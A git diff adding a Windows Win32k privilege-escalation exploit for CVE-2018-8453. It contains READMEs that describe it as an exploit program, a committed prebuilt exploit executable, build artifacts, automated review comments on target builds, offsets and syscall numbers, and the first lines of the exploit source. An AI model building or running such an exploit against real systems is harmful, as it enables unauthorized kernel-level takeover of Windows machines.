diff --git a/CVE-2018-8453/4.mp4 b/CVE-2018-8453/4.mp4
new file mode 100644
index 0000000..68a9de1
Binary files /dev/null and b/CVE-2018-8453/4.mp4 differ
diff --git a/CVE-2018-8453/README.md b/CVE-2018-8453/README.md
new file mode 100644
index 0000000..5e04340
--- /dev/null
+++ b/CVE-2018-8453/README.md
@@ -0,0 +1,14 @@
+# Privilege escalation
+
+## Description
+
+```
+An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
+```
+
+## Vulnerability reference
+
+* [CVE-2018-8453](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8453)
+* [https://github.com/ze0r/cve-2018-8453-exp](https://github.com/ze0r/cve-2018-8453-exp)
+* [[上篇]从补丁diff到EXP--CVE-2018-8453漏洞分析与利用](https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig)
+* [[下篇]从补丁diff到EXP--CVE-2018-8453漏洞分析与利用](https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ)
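Review bot: the README only reproduces the generic MSRC description and says nothing about what this directory actually ships or on which targets it works; the constraints are recorded only in exp-x86_pool_fengshui/README.md (bug present from Win7, exploitable only from Win8.1 onwards, developed and tested on Windows 10 RS2 15063, x64 for 2008/2012 still in progress) and in the source (`VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86`). Put those constraints here, under the title, so a reader does not run an x86/15063-only kernel exploit on another build and bugcheck it. Minor: the MITRE reference uses `http://`; use `https://cve.mitre.org/...`.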
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/1.jpg b/CVE-2018-8453/exp-x86_pool_fengshui/1.jpg
new file mode 100644
index 0000000..446b320
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/1.jpg differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/2.jpg b/CVE-2018-8453/exp-x86_pool_fengshui/2.jpg
new file mode 100644
index 0000000..5e459c6
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/2.jpg differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/3.jpg b/CVE-2018-8453/exp-x86_pool_fengshui/3.jpg
new file mode 100644
index 0000000..efae189
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/3.jpg differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/4.mp4 b/CVE-2018-8453/exp-x86_pool_fengshui/4.mp4
new file mode 100644
index 0000000..68a9de1
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/4.mp4 differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/README.md b/CVE-2018-8453/exp-x86_pool_fengshui/README.md
new file mode 100644
index 0000000..06c960d
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/README.md
@@ -0,0 +1,13 @@
+# cve-2018-8453-exp
+cve-2018-8453 exp
+本程序为cve-2018-8453的利用程序。
+漏洞本身存在于win7及以后版本
+但注意: 只有在win8.1及以后版本中才能利用!故本EXP只可用于WIN8.1及以后版本。
+
+开发\测试平台:windows 10 rs2 15063
+附: 使用Palette来读写内核
+
+windows 2008 和 windows2012 x64位改版中。。
+
+
+严重声明: 本工具仅用于技术研究学习。非法使用造成一切后果,均与本人无关。
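Review bot: the README says "only exploitable on Win8.1 and later, so this EXP is for Win8.1+" and "developed/tested on Windows 10 RS2 15063", but the code is pinned far more narrowly than that: `VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86` plus the hard-coded syscall numbers 0x1202 and 0x1023 and the code offsets used in GetKernelHandleTable all belong to that one x86 build, and the solution only builds Win32. State explicitly that this is x86-only and that any other build needs new EPROCESS/token offsets and syscall numbers (the directory name says x86_pool_fengshui, the README does not), and give the target builds for the "Windows 2008 and 2012 x64 port in progress" line rather than leaving it open.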
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/.vs/cve8453/v14/.suo b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/.vs/cve8453/v14/.suo
new file mode 100644
index 0000000..288a0bd
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/.vs/cve8453/v14/.suo differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/Release/cve8453.exe b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/Release/cve8453.exe
new file mode 100644
index 0000000..8019193
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/Release/cve8453.exe differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.VC.db b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.VC.db
new file mode 100644
index 0000000..0e411b6
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.VC.db differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.sln b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.sln
new file mode 100644
index 0000000..cb4b626
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve8453", "cve8453\cve8453.vcxproj", "{9EAE33EA-0B19-4794-B231-0D53D802B882}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x64.ActiveCfg = Debug|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x64.Build.0 = Debug|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x86.ActiveCfg = Debug|Win32
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x86.Build.0 = Debug|Win32
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x64.ActiveCfg = Release|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x64.Build.0 = Release|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x86.ActiveCfg = Release|Win32
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.log b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.log
new file mode 100644
index 0000000..df9d0e9
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.log
@@ -0,0 +1,4 @@
+ stdafx.cpp
+ cve8453.cpp
+ cve8453.vcxproj -> c:\users\ze0r\desktop\cve8453\Debug\cve8453.exe
+ cve8453.vcxproj -> c:\users\ze0r\desktop\cve8453\Debug\cve8453.pdb (Full PDB)
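Review bot: build output and IDE state should not be committed. This log, the Debug/ and Release/ .obj, .pch, .res, .pdb, .idb and .tlog files, .vs/cve8453/v14/.suo, cve8453.VC.db, cve8453.aps and the prebuilt Release/cve8453.exe are all regenerated by a build, and the logs embed the author's local path `c:\users\ze0r\desktop\cve8453\`. Add a .gitignore covering .vs/, Debug/, Release/, *.VC.db, *.aps, *.pdb and *.tlog, and leave the binary out so reviewers rebuild from source rather than trust a committed exploit executable.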
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.obj
new file mode 100644
index 0000000..313818e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.pch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.pch
new file mode 100644
index 0000000..05e7706
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.res b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.res
new file mode 100644
index 0000000..dad5dde
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.res differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..742b9a2
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..a295939
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..f4b2ef8
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/cve8453.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/cve8453.lastbuildstate
new file mode 100644
index 0000000..6c36556
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/cve8453.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Debug|Win32|c:\users\ze0r\desktop\cve8453\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.command.1.tlog
new file mode 100644
index 0000000..9012683
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.read.1.tlog
new file mode 100644
index 0000000..be50726
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.write.1.tlog
new file mode 100644
index 0000000..0dd87ca
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.command.1.tlog
new file mode 100644
index 0000000..ae5239d
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.read.1.tlog
new file mode 100644
index 0000000..7e37c35
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.write.1.tlog
new file mode 100644
index 0000000..bbf7e63
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/stdafx.obj
new file mode 100644
index 0000000..d8f8b19
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.idb b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.idb
new file mode 100644
index 0000000..5c423e1
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.idb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.pdb
new file mode 100644
index 0000000..7d1655e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/ReadMe.txt b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/ReadMe.txt
new file mode 100644
index 0000000..2d0f77d
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/ReadMe.txt
@@ -0,0 +1,45 @@
+========================================================================
+ WIN32 应用程序:cve8453 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 cve8453 应用程序。
+
+本文件概要介绍组成 cve8453 应用程序的每个文件的内容。
+
+
+cve8453.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+cve8453.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+cve8453.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+应用程序向导创建了下列资源:
+
+cve8453.rc
+ 这是程序使用的所有 Microsoft Windows 资源的列表。它包括 RES 子目录中存储的图标、位图和光标。此文件可以直接在 Microsoft Visual C++ 中进行编辑。
+
+Resource.h
+ 这是标准头文件,可用于定义新的资源 ID。Microsoft Visual C++ 将读取并更新此文件。
+
+cve8453.ico
+ 这是用作应用程序图标 (32x32) 的图标文件。此图标包括在主资源文件 cve8453.rc 中。
+
+small.ico
+ 这是一个图标文件,其中包含应用程序的图标的较小版本 (16x16)。此图标包括在主资源文件 cve8453.rc 中。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 cve8453.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
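Review bot: this is the unmodified Visual Studio wizard ReadMe (it describes cve8453.vcxproj.filters, StdAfx.h/StdAfx.cpp, the two icons and the wizard's "TODO:" comments) and contains nothing about the exploit. Drop it, or replace it with the real build requirements that are otherwise only visible in the tlog state files (PlatformToolSet=v140, Win32/Native32Bit, WindowsTargetPlatformVersion=8.1) and a pointer to the directory README.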
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.Build.CppClean.log
new file mode 100644
index 0000000..ab9887c
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.Build.CppClean.log
@@ -0,0 +1,18 @@
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.pch
+c:\users\ze0r\desktop\cve8453\cve8453\release\vc140.pdb
+c:\users\ze0r\desktop\cve8453\cve8453\release\stdafx.obj
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.obj
+c:\users\ze0r\desktop\cve8453\release\cve8453.exe
+c:\users\ze0r\desktop\cve8453\release\cve8453.ipdb
+c:\users\ze0r\desktop\cve8453\release\cve8453.iobj
+c:\users\ze0r\desktop\cve8453\release\cve8453.pdb
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.res
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\link.write.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\rc.command.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\rc.read.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\rc.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.log b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.log
new file mode 100644
index 0000000..4dc0050
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.log
@@ -0,0 +1,8 @@
+ cve8453.cpp
+ 正在生成代码
+ 1 of 123 functions ( 0.8%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 0 functions had inline decision re-evaluated but remain unchanged
+ 已完成代码的生成
+ cve8453.vcxproj -> C:\Users\ze0r\Desktop\cve8453\Release\cve8453.exe
+ cve8453.vcxproj -> C:\Users\ze0r\Desktop\cve8453\Release\cve8453.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.obj
new file mode 100644
index 0000000..792f03d
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.pch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.pch
new file mode 100644
index 0000000..5e8ad85
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.res b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.res
new file mode 100644
index 0000000..dad5dde
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.res differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..9561f96
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..1d4afbc
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..9a863ed
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/cve8453.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/cve8453.lastbuildstate
new file mode 100644
index 0000000..787bf13
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/cve8453.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|Win32|C:\Users\ze0r\Desktop\cve8453\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.command.1.tlog
new file mode 100644
index 0000000..c8c12b3
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.read.1.tlog
new file mode 100644
index 0000000..ed7987c
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.write.1.tlog
new file mode 100644
index 0000000..59e1953
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.command.1.tlog
new file mode 100644
index 0000000..6723925
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.read.1.tlog
new file mode 100644
index 0000000..7e37c35
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.write.1.tlog
new file mode 100644
index 0000000..1322886
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/stdafx.obj
new file mode 100644
index 0000000..663e7c3
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/vc140.pdb
new file mode 100644
index 0000000..c113851
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Resource.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Resource.h
new file mode 100644
index 0000000..060a1b8
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Resource.h
@@ -0,0 +1,31 @@
+//{{NO_DEPENDENCIES}}
+// Microsoft Visual C++ generated include file.
+// Used by cve8453.rc
+//
+
+#define IDS_APP_TITLE 103
+
+#define IDR_MAINFRAME 128
+#define IDD_CVE8453_DIALOG 102
+#define IDD_ABOUTBOX 103
+#define IDM_ABOUT 104
+#define IDM_EXIT 105
+#define IDI_CVE8453 107
+#define IDI_SMALL 108
+#define IDC_CVE8453 109
+#define IDC_MYICON 2
+#ifndef IDC_STATIC
+#define IDC_STATIC -1
+#endif
+// �¶������һ��Ĭ��ֵ
+//
+#ifdef APSTUDIO_INVOKED
+#ifndef APSTUDIO_READONLY_SYMBOLS
+
+#define _APS_NO_MFC 130
+#define _APS_NEXT_RESOURCE_VALUE 129
+#define _APS_NEXT_COMMAND_VALUE 32771
+#define _APS_NEXT_CONTROL_VALUE 1000
+#define _APS_NEXT_SYMED_VALUE 110
+#endif
+#endif
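Review bot: the comment `// �¶������һ��Ĭ��ֵ` is a mis-encoded Chinese comment: the file is saved in the local code page, not UTF-8, so it renders as mojibake anywhere outside that locale (the same happens to every comment in cve8453.cpp). Re-save the sources as UTF-8 (with BOM, so MSVC v140 reads them correctly) so the comments survive; the generated IDs themselves are standard wizard output and fine.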
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.aps b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.aps
new file mode 100644
index 0000000..1815b73
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.aps differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.cpp
new file mode 100644
index 0000000..8b45412
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.cpp
@@ -0,0 +1,407 @@
+#include "windows.h"
+#include "stdafx.h"
+#include "psapi.h"
+#include "cve8453.h"
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+DWORD SystemCallStub;
+CHAR flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE hManager;
+HPALETTE hWorker;
+HPALETTE hKeep;
